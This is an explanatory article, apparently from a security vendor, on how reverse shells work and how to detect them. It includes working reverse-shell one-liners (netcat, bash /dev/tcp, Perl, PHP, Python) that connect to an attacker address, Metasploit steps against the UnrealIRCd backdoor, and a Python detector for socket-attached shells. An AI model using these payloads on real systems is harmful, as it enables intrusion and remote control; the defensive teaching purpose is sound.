A reverse shell is a kind of “virtual” shell that is initiated from a victim’s computer to connect to the attacker’s computer. Once the connection is established, it allows the attacker to send commands to execute on the victim’s computer and to get the results back. The attacker can execute any command or program on the victim’s computer with the same privileges as the currently logged-in user who initiated the connection.

A reverse shell connection is usually established over TCP, but it has also been seen over ICMP. The connection can be made through any port, for example port 80 or 443. This makes it difficult for firewalls and other network perimeter security solutions to detect and block, since these ports are usually allowed to be open by default. When it uses port 443 (SSL), the network content cannot be inspected easily since it is encrypted.

A reverse shell connection can be initiated from a victim’s computer by executing many different built-in system applications, such as bash, telnet, netcat, a Perl script, a Python script, a PHP script, etc. The connection can be initiated by a standalone script or by embedded programs, as long as the attacker can get access to the victim’s computer system.

An attacker gets onto a victim’s computer mostly through exploitation of an application or system vulnerability, or through malware infection. Once the victim’s system is compromised, a reverse shell connection can be initiated easily. A reverse shell is an ideal choice for an attacker to plant a backdoor on the compromised computer.

Establish Reverse Shell

For illustration purposes, let’s take two Linux systems: one at 192.168.1.19 as the attacker, and the other at 192.168.1.17 as the victim.

On the attacker’s system, set it up to listen on a port, for example port 4444, by executing the following command:

     nc -lvp 4444

This starts Netcat listening on port 4444. You can also use any other port, such as port 80 or 443, which firewalls are most likely to leave open.

From the victim’s computer, execute the following command to connect to the attacker’s system:

     nc 192.168.1.19 4444 -e /bin/bash  

On Windows, use cmd.exe as the shell:

     nc.exe 192.168.1.19 4444 -e cmd.exe

There are also many other ways to initiate a connection to the attacker’s system:

  • Bash reverse shell: bash -i >& /dev/tcp/192.168.1.19/4444 0>&1
  • Perl reverse shell: perl -e 'use Socket;$i="192.168.1.19";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
  • PHP reverse shell: php -r '$sock=fsockopen("192.168.1.19",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
  • Python reverse shell: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.19",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

These commands can be launched from a command-line console, but they can also be embedded into an application file. When the application runs, the reverse shell connection is initiated.

Detect Reverse Shell

In order to initiate a reverse shell connection from a victim’s system, the attacker needs access to the victim’s system to execute the reverse shell initiation code. This can be achieved by tricking a user into executing a malware program file or through exploitation of a system vulnerability.

For demo purposes, let’s set up a Linux system as the victim computer at 192.168.207.131, running the service UnrealIRCD version 3.2.8.1. This version of UnrealIRCD contains a vulnerability that allows a person to execute any command with the privileges of the user who starts the IRC service. Now, let’s start Kali Linux and execute the following 3 commands: “use exploit/unix/irc/unreal_ircd_3281_backdoor”, “set host 192.168.207.131”, “exploit”. After the “exploit” command succeeds, the attacker has obtained a reverse shell connected to the victim’s system. The attacker effectively controls the victim’s system and can execute any command or run any program on it with the same privileges as the user who initiated the connection. Detecting a reverse shell attack can be difficult for a firewall when the connection is made via commonly open ports, such as port 80, and its traffic cannot be decrypted if it uses a secure port, like 443.

However, detecting a reverse shell attack can be easier from the endpoint side. A process that has established a reverse shell shows certain behaviors and characteristics that differ from those of normal processes. TXHunter’s disposable agent runs on the victim computer, collects each process’s behavior and characteristics, analyzes them, and detects reverse shell attacks. The following lists its hunting result for a detected reverse shell attack, where you can see the attack sequence along with the processes and times. For details, download the whitepaper at https://triagingx.com/resources#2
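One endpoint-side characteristic shared by the netcat, bash, Perl, PHP and Python one-liners shown earlier is that the resulting shell has its stdin, stdout and stderr all attached to the same network socket. The following Python sketch is an added example, not code from the original article and not TXHunter’s method; it assumes a Linux host with a little-endian CPU, covers IPv4 only, and its function names are illustrative.

```python
import os, re, socket, struct

SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}       # process names treated as shells
SOCKET_LINK = re.compile(r"^socket:\[(\d+)\]$")     # readlink format of a socket fd

def stdio_socket_inode(proc_root, pid):
    """Inode of the one socket behind fds 0, 1 and 2, or None if stdio is anything else."""
    inodes = set()
    for fd in ("0", "1", "2"):
        try:
            target = os.readlink(os.path.join(proc_root, pid, "fd", fd))
        except OSError:          # process exited, or we may not inspect it
            return None
        match = SOCKET_LINK.match(target)
        if not match:            # a tty, pipe or file: not socket-driven stdio
            return None
        inodes.add(match.group(1))
    return inodes.pop() if len(inodes) == 1 else None

def tcp_peers(proc_root):
    """Map socket inode -> 'ip:port' of the remote end, parsed from net/tcp (IPv4 only)."""
    peers = {}
    with open(os.path.join(proc_root, "net", "tcp")) as table:
        rows = table.readlines()[1:]     # skip the header row
    for row in rows:
        cols = row.split()
        if len(cols) >= 10:              # cols[2] = remote addr:port in hex, cols[9] = inode
            addr, port = cols[2].split(":")
            ip = socket.inet_ntoa(struct.pack("<I", int(addr, 16)))  # little-endian host
            peers[cols[9]] = f"{ip}:{int(port, 16)}"
    return peers

def find_socket_shells(proc_root="/proc"):
    """Return (pid, name, peer) for each shell whose stdin/stdout/stderr are one socket."""
    peers = tcp_peers(proc_root)
    hits = []
    for pid in sorted(filter(str.isdigit, os.listdir(proc_root)), key=int):
        try:
            with open(os.path.join(proc_root, pid, "comm")) as f:
                name = f.read().strip()
        except OSError:
            continue
        inode = stdio_socket_inode(proc_root, pid)
        if name in SHELLS and inode:
            hits.append((pid and int(pid), name, peers.get(inode, "unknown")))
    return hits

if __name__ == "__main__":
    print(find_socket_shells())  # list of (pid, shell name, remote peer)
```

Interactive shells started from a terminal or over SSH use a pty rather than a socket for stdio, so they are not reported. Run it as root to inspect processes owned by other users.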

Sources

  1. https://stackoverflow.com/questions/35271850/what-is-a-reverse-shell
  2. https://resources.infosecinstitute.com/icmp-reverse-shell/
  3. https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bin-reverse-shells/
  4. Richard Hammer, Inside-out Vulnerabilities, Reverse Shells, https://www.sans.org/reading-room/whitepapers/covert/paper/1663
  5. https://cve.circl.lu/cve/CVE-2010-2075
  6. https://www.kali.org/downloads
  7. https://www.hackingtutorials.org/metasploit-tutorials/hacking-unreal-ircd-3-2-8-1/